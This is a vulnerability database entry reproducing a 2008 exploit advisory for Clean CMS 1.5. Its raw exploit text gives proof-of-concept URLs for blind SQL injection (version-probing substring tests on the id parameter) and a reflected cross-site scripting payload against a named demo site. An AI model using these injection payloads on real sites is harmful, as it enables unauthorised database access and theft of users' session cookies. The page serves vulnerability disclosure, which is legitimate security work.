header-logo
Suggest Exploit
vendor:
Clean CMS
by:
ZoRLu
8.8
CVSS
HIGH
Blind SQL & XSS
89, 79
CWE
Product Name: Clean CMS
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:4yoursite:clean_cms:1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.

Clean CMS 1.5 is prone to multiple remote vulnerabilities, including blind SQL injection and cross-site scripting. An attacker can exploit these issues to execute arbitrary SQL commands in the context of the affected application, steal cookie-based authentication credentials, and launch other attacks. The demo URLs provided in the exploit code demonstrate the vulnerabilities.

Mitigation:

Upgrade to the latest version of Clean CMS 1.5 or apply the patch from the vendor.
Source

Exploit-DB raw data:

[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.
[~]
[~] script: http://www.4yoursite.nl/script_clean_cms.php
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: RedHaK Kardesime ozel tesekurler.
[~] -----------------------------------------------------------

exp for demo:

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )

XSS for demo:

http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id="><script>alert()</script>


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & RedHaK
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-25]